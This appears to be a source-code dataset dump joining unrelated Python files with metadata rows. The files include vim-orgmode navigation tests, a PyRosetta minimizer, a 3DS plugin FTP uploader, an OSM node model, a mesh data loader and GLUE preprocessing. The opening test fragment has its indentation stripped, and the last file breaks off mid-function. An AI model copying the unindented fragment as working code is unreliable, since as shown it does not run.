set_visual_selection(u'V', 3, 5, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV3ggo'))
# heading
# text
# << text
# text| >>
set_visual_selection(u'V', 8, 9, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 6ggV8ggo'))
# heading
# << text
# x. heading
# text| >>
set_visual_selection(u'V', 12, 14, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV12gg'))
set_visual_selection(u'V', 12, 15, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV12gg'))
# heading
# << |text
# x. heading
# text >>
set_visual_selection(u'V', 12, 15, cursor_pos=START)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 10ggV15ggo'))
# heading
# << text
# x. heading| >>
set_visual_selection(u'V', 12, 13, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV12gg'))
# heading
# << text
# heading
# text
# x. heading| >>
set_visual_selection(u'V', 12, 16, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV15gg'))
# << text
# heading
# text
# heading| >>
set_visual_selection(u'V', 15, 17, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 15ggV16gg'))
# heading
# << |text
# text
# heading
# text >>
set_visual_selection(u'V', 4, 8, cursor_pos=START)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV8ggo'))
# heading
# << text
# text
# heading
# text| >>
set_visual_selection(u'V', 4, 8, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 4ggV5gg'))
# heading
# << text
# text
# heading
# text| >>
set_visual_selection(u'V', 4, 5, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV4ggo'))
# BOF
# << |heading
# text
# heading
# text >>
set_visual_selection(u'V', 2, 8, cursor_pos=START)
self.assertEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV8ggo'))
# BOF
# heading
# << text
# text| >>
set_visual_selection(u'V', 3, 4, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV3ggo'))
# BOF
# << heading
# text
# text| >>
set_visual_selection(u'V', 2, 4, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV2ggo'))
# << text
# heading
# text
# x. heading
# text| >>
set_visual_selection(u'V', 8, 14, cursor_pos=END)
self.navigator.previous(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 8ggV12gg'))
def test_parent_movement_visual(self):
# selection start: <<
# selection end: >>
# cursor poistion: |
# heading
# << text|
# text
# text >>
set_visual_selection(u'V', 4, 8, cursor_pos=START)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! gv'))
# heading
# << text|
# text
# text >>
set_visual_selection(u'V', 6, 8, cursor_pos=START)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV8ggo'))
# heading
# << text
# text
# text| >>
set_visual_selection(u'V', 6, 8, cursor_pos=END)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 6ggV5gg'))
# << |heading
# text
# text
# text >>
set_visual_selection(u'V', 2, 8, cursor_pos=START)
self.assertEqual(self.navigator.parent(mode=u'visual'), None)
# << heading
# text
# heading
# text| >>
set_visual_selection(u'V', 2, 8, cursor_pos=END)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV5gg'))
set_visual_selection(u'V', 7, 8, cursor_pos=START)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV8ggo'))
# heading
# heading
# << text
# text| >>
set_visual_selection(u'V', 12, 13, cursor_pos=END)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV12gg'))
set_visual_selection(u'V', 10, 12, cursor_pos=START)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV12ggo'))
# heading
# << text
# text
# heading| >>
set_visual_selection(u'V', 11, 17, cursor_pos=END)
self.assertEqual(self.navigator.parent(mode=u'visual'), None)
# << text
# heading
# text
# x. heading
# text| >>
set_visual_selection(u'V', 8, 14, cursor_pos=END)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 8ggV12gg'))
def suite():
return unittest.TestLoader().loadTestsFromTestCase(NavigatorTestCase)
| 31.749211 | 93 | 0.696657 | 2,960 | 20,129 | 4.630405 | 0.058446 | 0.113819 | 0.056034 | 0.099518 | 0.900482 | 0.882971 | 0.872246 | 0.866117 | 0.844302 | 0.815117 | 0 | 0.031468 | 0.130111 | 20,129 | 633 | 94 | 31.799368 | 0.751285 | 0.093199 | 0 | 0.68661 | 0 | 0 | 0.123464 | 0.00681 | 0 | 0 | 0 | 0.00158 | 0.384615 | 1 | 0.034188 | false | 0 | 0.014245 | 0.002849 | 0.054131 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bb3c72279c5fcf27f702b631f5d1c82f5eec0b49 | 728 | py | Python | ch9_1_dogs.py | codeplinth/python_crash_course | 865f326936dcfab12e77747be73bfcc632d4bde3 | [
"MIT"
] | null | null | null | ch9_1_dogs.py | codeplinth/python_crash_course | 865f326936dcfab12e77747be73bfcc632d4bde3 | [
"MIT"
] | null | null | null | ch9_1_dogs.py | codeplinth/python_crash_course | 865f326936dcfab12e77747be73bfcc632d4bde3 | [
"MIT"
] | null | null | null | class Dog:
"""Simple attempt to model a dog"""
def __init__(self,name,age):
"""Initialize name and age attributes"""
self.name = name
self.age = age
def sit(self):
"""Simulate a dog sitting in response to a command"""
print(f"{self.name} is now sitting !")
def roll_over(self):
"""Simulate rolling over in response to a command"""
print(f"{self.name} rolled over !")
my_dog = Dog('Willie',6)
your_dog = Dog('Lucy',2)
print(f"My dog's name is {my_dog.name}.")
print(f"My dog's age is {my_dog.age} years.")
my_dog.sit()
my_dog.roll_over()
print(f"Your dog's name is {my_dog.name}.")
print(f"Your dog's age is {my_dog.age} years.")
your_dog.sit()
| 24.266667 | 61 | 0.616758 | 123 | 728 | 3.528455 | 0.300813 | 0.103687 | 0.064516 | 0.059908 | 0.428571 | 0.373272 | 0.373272 | 0.373272 | 0.271889 | 0 | 0 | 0.003559 | 0.228022 | 728 | 29 | 62 | 25.103448 | 0.768683 | 0.218407 | 0 | 0 | 0 | 0 | 0.363803 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0 | 0 | 0 | 0.235294 | 0.352941 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb3e451968927b5f8712e4cdfc255420064f37b9 | 786 | py | Python | src/flute/version.py | antonsynd/flute | 4da0b3e0ff9e3fabdcf8aed1d2395dcf62d48211 | [
"MIT"
] | 1 | 2020-11-26T03:06:58.000Z | 2020-11-26T03:06:58.000Z | src/flute/version.py | antonsynd/flute | 4da0b3e0ff9e3fabdcf8aed1d2395dcf62d48211 | [
"MIT"
] | null | null | null | src/flute/version.py | antonsynd/flute | 4da0b3e0ff9e3fabdcf8aed1d2395dcf62d48211 | [
"MIT"
] | null | null | null | """
Decorator to gate some of the tools here on what is available in the FL Studio
MIDI Scripting API version.
"""
import general
_fl_midi_scripting_api_version_number = general.getVersion()
def require_version(version):
def require_version_decorator(f):
def require_version_wrapper(*args, **kwargs):
if version > _fl_midi_scripting_api_version_number:
raise NotImplementedError(
'{}() not available in FL Studio MIDI Scripting API '
'version {}, requires version {}'.format(
f.__name__, _fl_midi_scripting_api_version_number,
version))
return f(*args, **kwargs)
return require_version_wrapper
return require_version_decorator
| 30.230769 | 78 | 0.647583 | 88 | 786 | 5.431818 | 0.420455 | 0.135983 | 0.167364 | 0.240586 | 0.324268 | 0.324268 | 0 | 0 | 0 | 0 | 0 | 0 | 0.284987 | 786 | 25 | 79 | 31.44 | 0.850534 | 0.13486 | 0 | 0 | 0 | 0 | 0.122024 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bb403acdcf0fd7c25a1e41c78341852ffd2414a4 | 3,461 | py | Python | folding/minimizer.py | bigict/ProFOLD | 8fac3e18d25348fc9d1fbb17552a3ce3ae1cb953 | [
"MIT"
] | 1 | 2021-08-02T07:36:03.000Z | 2021-08-02T07:36:03.000Z | folding/minimizer.py | bigict/ProFOLD | 8fac3e18d25348fc9d1fbb17552a3ce3ae1cb953 | [
"MIT"
] | null | null | null | folding/minimizer.py | bigict/ProFOLD | 8fac3e18d25348fc9d1fbb17552a3ce3ae1cb953 | [
"MIT"
] | null | null | null | import os
import threading
import queue
import numpy as np
from pyrosetta import (
pose_from_sequence,
MoveMap,
rosetta,
create_score_function,
SwitchResidueTypeSetMover,
)
from pyrosetta.rosetta.protocols.minimization_packing import MinMover
from score import score_it
def _random_dihedral():
phi = [-140, -72, -122, -82, -61, 57]
psi = [153, 145, 117, -14, -41, 39]
w = [0.135, 0.155, 0.073, 0.122, 0.497, 0.018]
p = np.random.choice(range(6), p=w)
return phi[p], psi[p]
def _set_random_dihedral(pose):
for i in range(1, pose.total_residue()):
phi, psi = _random_dihedral()
pose.set_phi(i, phi)
pose.set_psi(i, psi)
pose.set_omega(i, 180)
def _random_pose(seq, constraint):
pose = pose_from_sequence(seq, "centroid")
_set_random_dihedral(pose)
constraint.apply(pose)
return pose
def _add_noise(pose):
for i in range(1, pose.total_residue()):
phi = pose.phi(i) + np.random.normal(0, 60)
psi = pose.psi(i) + np.random.normal(0, 60)
pose.set_phi(i, phi)
pose.set_psi(i, psi)
def _minimize_step(sf, pose):
mmap = MoveMap()
mmap.set_bb(True)
mmap.set_chi(False)
mmap.set_jump(True)
min_mover = MinMover(mmap, sf, "lbfgs_armijo_nonmonotone", 0.0001, True)
min_mover.max_iter(1000)
min_mover.apply(pose)
def _worker(seq, constraint, sf, run_dir, pose_pool, pool_size, task_queue, mutex):
while True:
try:
idx = task_queue.get(block=False)
print("Start minimize %i ................." % idx)
mutex.acquire()
if len(pose_pool) < pool_size or np.random.random() < 0.1:
pose = _random_pose(seq, constraint)
else:
p = np.random.randint(len(pose_pool))
pose = pose_pool[p].clone()
_add_noise(pose)
mutex.release()
_minimize_step(sf, pose)
mutex.acquire()
pose_pool.append(pose)
if len(pose_pool) > pool_size:
pose_pool.sort(key=lambda x: score_it(sf, x))
del pose_pool[-1]
print("Score %i: %f" % (idx, score_it(sf, pose)))
mutex.release()
except queue.Empty:
break
def repeat_minimize(seq, constraints, sf, run_dir, n_workers, n_structs, n_iter):
pose_pool = []
mutex = threading.Lock()
q = queue.Queue()
for i in range(1, n_iter + 1):
q.put(i)
threads = []
for i in range(n_workers):
thread = threading.Thread(
target=_worker,
args=(seq, constraints, sf, run_dir, pose_pool, n_structs, q, mutex),
)
thread.start()
threads.append(thread)
for x in threads:
x.join()
pose_pool.sort(key=lambda x: score_it(sf, x))
return pose_pool
def relax(pose):
sf = create_score_function("ref2015")
sf.set_weight(rosetta.core.scoring.atom_pair_constraint, 5)
sf.set_weight(rosetta.core.scoring.dihedral_constraint, 1)
sf.set_weight(rosetta.core.scoring.angle_constraint, 1)
mmap = MoveMap()
mmap.set_bb(True)
mmap.set_chi(True)
mmap.set_jump(True)
relax = rosetta.protocols.relax.FastRelax()
relax.set_scorefxn(sf)
relax.max_iter(200)
relax.dualspace(True)
relax.set_movemap(mmap)
switch = SwitchResidueTypeSetMover("fa_standard")
switch.apply(pose)
relax.apply(pose)
| 27.91129 | 83 | 0.613118 | 480 | 3,461 | 4.225 | 0.30625 | 0.047337 | 0.011834 | 0.021696 | 0.248028 | 0.20858 | 0.127219 | 0.127219 | 0.127219 | 0.093688 | 0 | 0.034834 | 0.261774 | 3,461 | 123 | 84 | 28.138211 | 0.758904 | 0 | 0 | 0.176471 | 0 | 0 | 0.028027 | 0.006934 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078431 | false | 0 | 0.068627 | 0 | 0.176471 | 0.019608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb4056293343dbab19d3e2d5e53479051955458c | 883 | py | Python | sendfile.py | ponpoko094/Colorful-MHX3gx | a795266f6872eee9eb2ea3dac2bc567cbb35dcfb | [
"MIT"
] | 4 | 2021-12-12T02:20:11.000Z | 2021-12-12T02:20:16.000Z | sendfile.py | ponpoko094/Colorful-MHX3gx | a795266f6872eee9eb2ea3dac2bc567cbb35dcfb | [
"MIT"
] | 2 | 2021-12-04T04:02:41.000Z | 2021-12-07T04:40:57.000Z | sendfile.py | ponpoko094/MHX3gx | 9abd1f9758013c81622334c88c799482cf79e4b2 | [
"MIT"
] | 2 | 2021-11-12T00:21:32.000Z | 2021-11-12T07:08:51.000Z | # -*- coding: utf-8 -*-
""" What is sendfile.py
This module is send 3gx to 3ds via FTP.
このモジュールはFTPで3gxを3dsに送信します。
"""
import ftplib
from ftplib import FTP
print("--------------------------")
print("Trying to Send the Plugin over FTP...")
get_ftp = FTP()
HOST_ADDRESS = "192.168.0.50"
PORT = 5000
TIME_OUT = 30.0
try:
get_ftp.connect(HOST_ADDRESS, PORT, TIME_OUT)
except ftplib.all_errors:
print("Failed to Connect on " + HOST_ADDRESS + " : " + str(PORT))
PATH = "luma/plugins/0004000000155400"
PLUGIN = "/Colorful-MHX3gx.3gx"
try:
print("Successfully Logged in " + HOST_ADDRESS + "\n")
print("Response : " + get_ftp.getwelcome())
get_ftp.login()
get_ftp.storbinary("STOR " + PATH + PLUGIN,
open(PLUGIN.replace("/", ""), "rb"))
print("Sending Plugin to " + PATH + "\n")
except ftplib.all_errors:
print("Login Failed!\n")
| 24.527778 | 69 | 0.628539 | 117 | 883 | 4.632479 | 0.538462 | 0.055351 | 0.055351 | 0.077491 | 0.095941 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054622 | 0.191393 | 883 | 35 | 70 | 25.228571 | 0.704482 | 0.123443 | 0 | 0.173913 | 0 | 0 | 0.296345 | 0.071802 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.086957 | 0.304348 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb41685c8c33dcbafe597ec7414699791810848e | 2,888 | py | Python | src/models/node.py | Informatik-HS-KL/BEGGEL-SP-Map-Matcher-WS19 | c3532a86640631dcafa4e88d6efb32360f0faf0f | [
"Apache-2.0"
] | 1 | 2021-07-21T13:51:18.000Z | 2021-07-21T13:51:18.000Z | src/models/node.py | Informatik-HS-KL/BEGGEL-SP-Map-Matcher-WS19 | c3532a86640631dcafa4e88d6efb32360f0faf0f | [
"Apache-2.0"
] | null | null | null | src/models/node.py | Informatik-HS-KL/BEGGEL-SP-Map-Matcher-WS19 | c3532a86640631dcafa4e88d6efb32360f0faf0f | [
"Apache-2.0"
] | null | null | null | """
Description: A Node is basically representing an osm-node. But the class Node also contains useful observer functions,
for example to convert the geometry of a Node-Object into several geo-formats, and mutator functions.
@date: 10/25/2019
@author: Lukas Felzmann, Sebastian Leilich, Kai Plautz
"""
from .node_id import NodeId
from shapely.geometry import Point
class Node:
def __init__(self, node_id: NodeId, lat_lon: tuple):
"""
:param node_id: NodeId-Object
:param lat_lon: tuple(lat, lon)
"""
self._id = node_id
self._latLon = lat_lon
self._tags = {}
self._links = []
self._parent_links = []
def add_parent_link(self, link):
"""
:param link: Link Object
:return: None
"""
self._parent_links.append(link)
def get_parent_links(self):
"""
:return: list(Link-Object)
"""
return self._parent_links
def get_links(self):
"""
:return: list(link)
"""
return self._links
def get_id(self):
"""
:return: NodeId Object
"""
return self._id
def get_latlon(self):
"""
:return: tuple (lat, lon)
"""
return self._latLon
def get_lat(self):
"""
:return: float
"""
return self._latLon[0]
def get_lon(self):
"""
:return: float
"""
return self._latLon[1]
def set_tags(self, tags: dict):
"""
:param tags: dict
:return: None
"""
if tags is None:
self._tags = {}
else:
self._tags = tags
def get_tags(self):
"""
:return: dict
"""
return self._tags
def add_link(self, link):
"""
:param link: Link Model related to that Node
:return: None
"""
self._links.append(link)
def to_geojson(self):
"""
:return: dict
"""
data = {
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [self.get_lon(), self.get_lat()]
},
"properties": {
"osm_node_id": self.get_osm_id(),
"geohash": self.get_geohash(),
"tags": self.get_tags()
}
}
return data
def to_wkt(self):
"""
:return: str
"""
lat, lon = self.get_latlon()
return Point(lon, lat).wkt
def __repr__(self):
return "Node: <id: %s> <latLon: %s>" % (self._id, self._latLon)
def get_osm_id(self):
"""
:return: int
"""
return self.get_id().get_osm_id()
def get_geohash(self):
"""
:return: str
"""
return self.get_id().get_geohash()
| 22.215385 | 119 | 0.496191 | 315 | 2,888 | 4.336508 | 0.273016 | 0.087848 | 0.021962 | 0.026354 | 0.142021 | 0.081991 | 0 | 0 | 0 | 0 | 0 | 0.005577 | 0.379155 | 2,888 | 129 | 120 | 22.387597 | 0.756274 | 0.235111 | 0 | 0.036364 | 0 | 0 | 0.053728 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.290909 | false | 0 | 0.036364 | 0.018182 | 0.563636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
bb41c4d99b6843964899cf16c40a4d079031229f | 5,972 | py | Python | UnstructuredMesh/DataLoaderUnstructuredMesh.py | MaximeRedstone/UnstructuredCAE-DA | b54bd53540c11aa1b70e5160751905141f463217 | [
"MIT"
] | null | null | null | UnstructuredMesh/DataLoaderUnstructuredMesh.py | MaximeRedstone/UnstructuredCAE-DA | b54bd53540c11aa1b70e5160751905141f463217 | [
"MIT"
] | null | null | null | UnstructuredMesh/DataLoaderUnstructuredMesh.py | MaximeRedstone/UnstructuredCAE-DA | b54bd53540c11aa1b70e5160751905141f463217 | [
"MIT"
] | null | null | null |
""" Data Loader for CAEs on Unstructured Meshes """
import sys, os, pickle, argparse
import numpy as np
from tabulate import tabulate
from datetime import datetime
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn.cluster import DBSCAN
from scipy.spatial import distance_matrix
from scipy.spatial.distance import cdist
from UnstructuredCAEDA.train import TrainAE
from UnstructuredCAEDA.VarDA import BatchDA
from UnstructuredCAEDA.data import GetData
from UnstructuredCAEDA.settings.models.CLIC import CLIC
from UnstructuredCAEDA.fluidity import vtktools
from UnstructuredCAEDA.UnstructuredMesh.Localisation import *
from UnstructuredCAEDA.UnstructuredMesh.HelpersUnstructuredMesh import *
class DataLoaderUnstructuredMesh(GetData):
""" Class to load data from data files (.vtu) for AEs Training or Data Assimilation
Abreviations: fp = file path
v = vertices
f = faces
ug = unstructured grid """
def __init__(self):
pass
def get_X(self, settings):
""" Args: settings: (CLICUnstructuredMesh class)
Returns: np.array of dimensions time steps x localised points """
fps = DataLoaderUnstructuredMesh.get_sorted_fps_U(settings.getDataDir())
filepath = getXFilePath(settings)
filepathIdxMatch = getMeshToNetworkIdxMatchingLocations(settings)
filepathIdxAll = getMeshToNetworkIdxLocations(settings)
filepathIdxOverlap = getIdxOverlap(settings)
if os.path.isfile(filepath):
print("Reading pickle file: ", filepath)
with open(filepath, "rb") as f:
X = pickle.load(f)
if settings.CLIC_UNSTRUCTURED: #Only read if localisation took place first
with open(filepathIdxMatch, "rb") as f:
idxDict = pickle.load(f)
settings.setMatchIdxMeshToIdxNetwork(idxDict)
with open(filepathIdxAll, "rb") as f:
idxDict = pickle.load(f)
settings.setIdxMeshToIdxNetwork(idxDict)
with open(filepathIdxOverlap, "rb") as f:
idxOverlap = pickle.load(f)
settings.setOverlappingRegions(idxOverlap)
else:
print("Creating pickle file for percentage: ", settings.getPercentOfVertices())
X = Localiser.createX(fps, settings)
outfile = open(filepath, 'wb')
pickle.dump(X, outfile)
outfile.close()
print("Shape read X: ", np.shape(X))
networkInput= DataLoaderUnstructuredMesh.toNetworkSpace(X, settings)
return networkInput
@staticmethod
def get_sorted_fps_U(data_dir):
""" Creates and returns list of .vtu filepaths sorted according
to timestamp in name.
Input files in data_dir must be of the
form LSBU_<TIMESTEP INDEX>_<SUBDOMAIN>.vtu """
fps = [f for f in os.listdir(data_dir) if not f.startswith('.')]
#Extract Subdomain number from data_dir
_, subdomain = data_dir.split("_") #split returns ["LSBU", "<Subdomain>"]
subdomain.replace("/", "")
#Extract index of timestep from file name
idx_fps = []
for fp in fps:
if not fp.startswith("."):
lsbu, timestep, extension = fp.split("_")
idx = int(timestep)
idx_fps.append(idx)
#sort by timestep
assert len(idx_fps) == len(fps)
zipped_pairs = zip(idx_fps, fps)
fps_sorted = [x for _, x in sorted(zipped_pairs)]
#add absolute path
fps_sorted = [data_dir + x for x in fps_sorted]
return fps_sorted
@staticmethod
def toNetworkSpace(X, settings):
""" Convert X to appropriate shape for AEs """
if settings.getDim() == 1:
networkInput = X
elif settings.getDim() == 2:
networkInput = DataLoaderUnstructuredMesh.reshape(X)
else:
raise NotImplementedError("Converting to network space only works for specific cases (see function description)")
return networkInput
# DEPRECATED CODE
# Below are functions used when experimenting with Tucodec 2D model that required minimum dimensions
# of 90 x 92 for size of convolution kernels to be smaller than data input size at all layers
@staticmethod
def reshape(X):
""" Reshape X of shape Timesteps x Scalars to Timesteps x nx x ny """
nbTimeSteps, nbVertices = np.shape(X)[0], np.shape(X)[1]
newshape, idxEnd = DataLoaderUnstructuredMesh.setNetworkSpace(nbVertices, np.ndim(X))
print("X entering network reshaping len = {} when will become = {}".format(nbVertices, idxEnd))
Xidx = []
for timestep in X:
timestep = timestep[:idxEnd]
Xidx.append(timestep)
for idx in range(nbTimeSteps):
oneTimestep = Xidx[idx]
oneTimestepReshaped = np.reshape(oneTimestep, newshape, order='F')
if idx == 0:
#fix length of vectors and initialize the output array:
nsize = np.shape(oneTimestepReshaped)
size = (nbTimeSteps,) + nsize
output = np.zeros(size)
output[idx] = oneTimestepReshaped
print("In network space, Xreshaped = ", np.shape(output))
return output
@staticmethod
def setNetworkSpace(n, dim):
if dim not in [2]:
raise NotImplementedError("function can only reshape 2D inputs")
nbOfVertices = int(n - (n % 10))
x, y = 92, 90
x, y = DataLoaderUnstructuredMesh.getXfromY(nbOfVertices, y)
newshape = x, y
idxEnd = x * y
return newshape, idxEnd
@staticmethod
def getXfromY(n, ymin):
xres = n // ymin
if (xres % 2 != 0):
xres = xres - 1
return xres, ymin | 39.03268 | 125 | 0.627595 | 649 | 5,972 | 5.719569 | 0.379045 | 0.039601 | 0.005388 | 0.015356 | 0.016703 | 0.016703 | 0.016703 | 0.016703 | 0 | 0 | 0 | 0.005436 | 0.291527 | 5,972 | 153 | 126 | 39.03268 | 0.871898 | 0.179672 | 0 | 0.101852 | 0 | 0 | 0.061654 | 0 | 0 | 0 | 0 | 0 | 0.009259 | 1 | 0.064815 | false | 0.009259 | 0.148148 | 0 | 0.277778 | 0.046296 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb41f1bb72ae99e6bb69d3bb195a661a2dbb73cb | 18,832 | py | Python | projects/text_classification/dataset/utils_glue.py | khloe-zhang/libai | 1787a6d920b09d3aed8b04cecb84535612f388b8 | [
"Apache-2.0"
] | 55 | 2021-12-10T08:47:06.000Z | 2022-03-28T09:02:15.000Z | projects/text_classification/dataset/utils_glue.py | khloe-zhang/libai | 1787a6d920b09d3aed8b04cecb84535612f388b8 | [
"Apache-2.0"
] | 106 | 2021-11-03T05:16:45.000Z | 2022-03-31T06:16:23.000Z | projects/text_classification/dataset/utils_glue.py | khloe-zhang/libai | 1787a6d920b09d3aed8b04cecb84535612f388b8 | [
"Apache-2.0"
] | 13 | 2021-12-29T08:12:08.000Z | 2022-03-28T06:59:45.000Z | # coding=utf-8
# Copyright 2021 The OneFlow Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from .utils import DataProcessor, EncodePattern, InputExample, InputFeatures
logger = logging.getLogger(__name__)
def glue_convert_examples_to_features(
examples,
tokenizer,
max_length,
task=None,
pattern=EncodePattern.bert_pattern,
label_list=None,
output_mode=None,
):
if task is not None:
processor = glue_processors[task]()
if label_list is None:
label_list = processor.get_labels()
logger.info(f"Using label list {label_list} for task {task}")
if output_mode is None:
output_mode = glue_output_modes[task]
logger.info(f"Using output mode {output_mode} for task {task}")
label_map = {label: i for i, label in enumerate(label_list)}
start_token = [] if tokenizer.start_token is None else [tokenizer.start_token]
end_token = [] if tokenizer.end_token is None else [tokenizer.end_token]
pad_id = tokenizer.pad_token_id
if pattern == EncodePattern.bert_pattern:
added_special_tokens = [2, 3]
elif pattern == EncodePattern.roberta_pattern:
added_special_tokens = [2, 4]
else:
raise KeyError("pattern is not a valid EncodePattern")
features = []
for (ex_index, example) in enumerate(examples):
if ex_index % 10000 == 0:
logger.info("Writing example %d of %d" % (ex_index, len(examples)))
tokens_a = tokenizer.tokenize(example.text_a)
tokens_b = None
if example.text_b:
tokens_b = tokenizer.tokenize(example.text_b)
_truncate_seq_pair(tokens_a, tokens_b, max_length - added_special_tokens[1])
else:
if len(tokens_a) > max_length - added_special_tokens[0]:
tokens_a = tokens_a[: (max_length - added_special_tokens[0])]
if pattern is EncodePattern.bert_pattern:
tokens = start_token + tokens_a + end_token
token_type_ids = [0] * len(tokens)
if tokens_b:
tokens += tokens_b + end_token
token_type_ids += [1] * (len(tokens) - len(token_type_ids))
elif pattern is EncodePattern.roberta_pattern:
tokens = start_token + tokens_a + end_token
token_type_ids = [0] * len(tokens)
if tokens_b:
tokens += end_token + tokens_b + end_token
token_type_ids += [1] * (len(tokens) - len(token_type_ids))
else:
raise KeyError("pattern is not a valid EncodePattern")
input_ids = tokenizer.convert_tokens_to_ids(tokens)
attention_mask = [1] * len(input_ids)
padding_length = max_length - len(input_ids)
input_ids = input_ids + ([pad_id] * padding_length)
attention_mask = attention_mask + ([0] * padding_length)
token_type_ids = token_type_ids + ([0] * padding_length)
label = None
if example.label is not None:
if output_mode == "classification":
label = label_map[example.label]
elif output_mode == "regression":
label = float(example.label)
if ex_index < 5:
logger.info("*** Example ***")
logger.info("guid: %s" % (example.guid))
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("attention_mask: %s" % " ".join([str(x) for x in attention_mask]))
